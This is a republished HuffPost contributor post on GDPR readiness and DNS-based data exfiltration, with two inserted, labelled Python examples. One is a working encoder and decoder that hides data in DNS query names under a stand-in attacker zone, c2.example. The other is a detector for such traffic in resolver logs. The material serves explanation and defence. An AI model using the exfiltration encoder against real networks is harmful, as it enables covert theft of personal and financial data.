The GDPR Compliance Conundrum: Where to start?

This post was published on the now-closed HuffPost Contributor platform.

A new Doomsday Clock is ticking down and it is set for May 25th 2018. Global catastrophe? Maybe. It depends on whether businesses are ready to handle the implications of the new data protection regime, the General Data Protection Regulation (GDPR).

GDPR is a wide-reaching set of rules that you must comply with if you hold data about people in the EU (not only its citizens), which, let's face it, could be any business today. In today's data-driven world it is a safeguard against data loss and network breaches, which have spiraled out of control in the last few years. Without much in the way of regulation, companies that were breached could get away with an apology, a crashing share price and probably an executive resignation or two. That is about to change, with severe fines looming. Data breaches have always had a significant effect on those whose data is stolen; under GDPR they will also reflect on the companies that were breached, to the tune of penalties of up to two or four percent of global annual turnover, depending on the infringement, as well as sanctions that can force an organization to stop processing personal data altogether.

However, there are a lot of grey areas in the GDPR, and it is unclear how exactly compliance will play out. So while a recent PwC study reported that CIOs are allocating millions of dollars of budget to accommodate GDPR, how do they know they are putting it in the right places? Where should they start?

It is important for organizations to have strong policies in place, but compliance does not need to be difficult. The easiest place to start is by strengthening your network security.

There are many ways to protect data, but one exposure that is often neglected is the unauthorized copying or retrieval of data via the Domain Name System, also known as data exfiltration via DNS. A recent IDC report looks at how DNS-based attacks have become a significant risk and must be considered as part of GDPR preparation.

DNS exfiltration is often part of an advanced persistent threat. Attackers inside your network spend time finding valuable data, but then have to get it out. While most security systems block obvious data transfer mechanisms like FTP, DNS is often left unsecured: almost every firewall lets internal hosts resolve names, and the organization's own resolver will forward a query for any domain to whichever name server is authoritative for it, including one the attacker controls. That gives attackers a loophole, one where connections to arbitrary servers are not blocked.

There are two ways data can be extracted over your network using DNS. The first is a slow but effective method where attackers embed small blocks of encoded data in the labels of DNS queries for a domain they control, so the data arrives at their authoritative name server one query at a time. The second is an approach called tunneling, which uses the queries as an upstream channel and the responses (for example TXT records) as a downstream channel to an accomplice name server. This gives attackers a command and control channel for their tools as well as a fast way of extracting data, with one known attack delivering 18,000 credit card numbers a minute to an attacker's server.
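The upstream half of both methods, as an added example that is not part of the original post or of any real tool: a payload is split into chunks, each chunk is base32-encoded and packed into the labels of a query name under an attacker-controlled zone, and the accomplice name server reassembles the chunks from the names it is asked about. The zone name c2.example, the chunk size and the `<seq>.<labels>.<zone>` layout are assumptions made for this example; the label and name length limits are the real DNS ones (RFC 1035). A small chunk size sent at long intervals is the slow method; large chunks sent back to back are the tunneling variant.

```python
import base64

# Assumption for this example: the attacker controls the zone "c2.example"
# (".example" is reserved for documentation, RFC 2606) and runs its
# authoritative name server, so any query for a name under that zone
# eventually reaches them, via the victim's own resolver.
EXFIL_DOMAIN = "c2.example"

MAX_LABEL = 63   # RFC 1035: a single label is at most 63 octets
MAX_NAME = 253   # practical maximum for a full domain name in text form


def encode_chunks(data: bytes, domain: str = EXFIL_DOMAIN, chunk_size: int = 30) -> list:
    """Turn `data` into query names of the form <seq>.<base32 labels>.<domain>.

    Base32 keeps each label inside the hostname character set (letters, digits,
    hyphen) and survives DNS case folding; padding is dropped because "=" is not
    a valid hostname character. The sequence number lets the receiver reorder
    chunks, since queries may arrive out of order or be retried by resolvers.
    """
    names = []
    for seq, offset in enumerate(range(0, len(data), chunk_size)):
        chunk = data[offset:offset + chunk_size]
        b32 = base64.b32encode(chunk).decode().rstrip("=").lower()
        # A long chunk is spread over several labels of at most 63 characters.
        labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
        name = ".".join([str(seq)] + labels + [domain])
        if len(name) > MAX_NAME:
            raise ValueError("chunk_size too large for this zone name")
        names.append(name)
    return names


def decode_names(names, domain: str = EXFIL_DOMAIN) -> bytes:
    """What the accomplice name server does with the names it is queried for:
    strip the zone, rejoin the base32 labels, restore padding and reassemble
    the chunks in sequence order (duplicates simply overwrite themselves)."""
    suffix = "." + domain
    chunks = {}
    for name in names:
        name = name.lower()
        if not name.endswith(suffix):
            continue                       # an unrelated query for this zone
        labels = name[:-len(suffix)].split(".")
        if not labels[0].isdigit():
            continue                       # no sequence number: not ours
        seq, b32 = int(labels[0]), "".join(labels[1:])
        b32 += "=" * (-len(b32) % 8)       # base32 decoding needs its padding back
        chunks[seq] = base64.b32decode(b32, casefold=True)
    return b"".join(chunks[seq] for seq in sorted(chunks))


if __name__ == "__main__":
    # Constructed sample payload (a test card number), not real data.
    payload = b"4111111111111111,12/24,123\n" * 3
    queries = encode_chunks(payload)
    for q in queries:
        print(q)                           # each line is one DNS query an attacker would send
    assert decode_names(reversed(queries)) == payload
```

Note what the victim's resolver sees: nothing but ordinary-looking A queries for a domain it has never heard of, each one distinct because the payload changes. That is exactly the pattern a detector has to look for, since no single query is malformed.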

Cybercriminals are using DNS for data exfiltration for two reasons. The first is that traditional security tools are typically able to lock down the easiest routes out of your network via more common protocols such as HTTP and FTP, so attackers must explore, experiment with and take advantage of other protocols.

The second, and perhaps more important, is that it is easy to hide exfiltrated data within the normal operation of a DNS service. Practically every application is IP-based and uses DNS, which means that most DNS servers are constantly busy. Then there is the additional problem of living in a world where BYOD and public Wi-Fi are prolific, making DNS access by devices that we neither know nor manage an everyday occurrence. The sheer volume of traffic makes it hard to see the requests used for exfiltration, especially when they are spaced out over time to look like normal traffic.

So how can you protect your networks? First, you need to inspect your DNS traffic. Traditional blocking techniques risk blocking legitimate traffic: just because a DNS request is going to an unknown domain does not mean it is malicious, and it is impossible to know every domain in use. If you embed security tooling in your DNS servers, so that you see what is happening inside the servers themselves rather than just packets on the wire, you have a much better overview.

Once you have identified malicious traffic, you can start to mitigate it. One option is to block malicious domains as soon as they are identified, using DNS reputation data to reduce the risk of both false positives and false negatives. You can also examine the traffic from specific questionable devices on your network to further target suspicious activity. Ideally, you want to identify attacks quickly, or in real time.
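The inspection step, as an added example that is not part of the original post or of any product: resolver query logs are aggregated per registered domain over the whole window, so that queries an attacker spaces out over time still add up, and a domain is flagged when it attracts many distinct, long, high-entropy subdomains, which is what encoded payloads look like and what ordinary hostnames such as `www` or `mail` do not. The log format, the thresholds and the "registered domain is the last two labels" rule are assumptions for this example (production code should use the Public Suffix List); the sample log is constructed inline, with the exfiltration names under c2.example generated from hashes so that they carry random-looking labels.

```python
import base64
import hashlib
import math
from collections import Counter, defaultdict
from typing import Dict, List, NamedTuple, Tuple


class DomainStats(NamedTuple):
    queries: int
    unique_subdomains: int
    mean_subdomain_len: float
    mean_entropy: float
    suspicious: bool


def entropy(s: str) -> float:
    """Shannon entropy in bits per character: 0 for "www", about 2 for "mail",
    and typically 4.5 or more for a base32-encoded data label."""
    counts = Counter(s)
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_registered(qname: str) -> Tuple[str, str]:
    """Assumption for this example: the registered domain is the last two labels.
    Real deployments need the Public Suffix List to handle names like co.uk."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def analyze(log_lines: List[str], min_unique: int = 5, min_len: int = 20,
            min_entropy: float = 3.5) -> Dict[str, DomainStats]:
    """Aggregate per registered domain over the whole window, not per minute,
    so low-and-slow queries are still counted together."""
    per_domain = defaultdict(list)
    for line in log_lines:
        _ts, _client, qname, _qtype = line.split()   # assumed log format
        registered, sub = split_registered(qname)
        per_domain[registered].append(sub)
    report = {}
    for registered, subs in per_domain.items():
        uniq = set(subs)
        mean_len = sum(len(s) for s in uniq) / len(uniq)
        mean_ent = sum(entropy(s) for s in uniq) / len(uniq)
        flag = (len(uniq) >= min_unique and mean_len >= min_len
                and mean_ent >= min_entropy)
        report[registered] = DomainStats(len(subs), len(uniq), mean_len, mean_ent, flag)
    return report


def suspicious_domains(log_lines: List[str]) -> List[str]:
    return sorted(d for d, s in analyze(log_lines).items() if s.suspicious)


# Constructed sample log, format "<timestamp> <client> <qname> <qtype>"; not real data.
NORMAL = [
    "2018-05-25T09:00:01 10.0.0.5 www.example.org A",
    "2018-05-25T09:00:02 10.0.0.5 mail.example.org A",
    "2018-05-25T09:00:03 10.0.0.7 cdn.example.org AAAA",
    "2018-05-25T09:00:04 10.0.0.7 api.example.org A",
    "2018-05-25T09:00:05 10.0.0.9 static.example.org A",
    "2018-05-25T09:00:06 10.0.0.9 www.example.org A",
]
# Eight exfiltration queries, one per minute, under the assumed attacker zone.
EXFIL = []
for i in range(8):
    digest = hashlib.sha256(b"chunk%d" % i).digest()   # stands in for encoded payload
    label = base64.b32encode(digest).decode().rstrip("=").lower()
    EXFIL.append(f"2018-05-25T09:{i:02d}:30 10.0.0.5 {i}.{label}.c2.example A")
SAMPLE_LOG = sorted(NORMAL + EXFIL)   # interleaved by timestamp

if __name__ == "__main__":
    for domain, stats in analyze(SAMPLE_LOG).items():
        print(f"{domain:12} queries={stats.queries} unique={stats.unique_subdomains} "
              f"len={stats.mean_subdomain_len:.1f} entropy={stats.mean_entropy:.2f} "
              f"{'SUSPICIOUS' if stats.suspicious else 'ok'}")
```

Two practical caveats: CDNs and some cloud services legitimately generate long, varied subdomains, which is where the reputation data the paragraph mentions earns its keep (an allow-list of known-good registered domains before the statistics are computed), and a determined attacker can lower entropy by encoding less data per query, which is why the per-domain count of unique names over a long window matters more than any single query. Query types such as TXT and NULL, and a high NXDOMAIN rate for one domain, are further signals worth adding to the same per-domain aggregation.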

Keeping on top of DNS security is the first step toward GDPR compliance, because compliance is not purely a matter of avoiding breaches; it is also a matter of timely reporting if data has been stolen. GDPR requires notifying the appropriate supervisory authority without undue delay and, where feasible, within 72 hours of becoming aware of a breach, and you cannot report a breach you have not detected. We live in an increasingly dangerous world, one where data is valuable to companies and to attackers. GDPR puts the onus on companies to be as secure as possible, with significant penalties for failure. That requires doing much more than protecting your databases: it means protecting every part of your IP network as well.
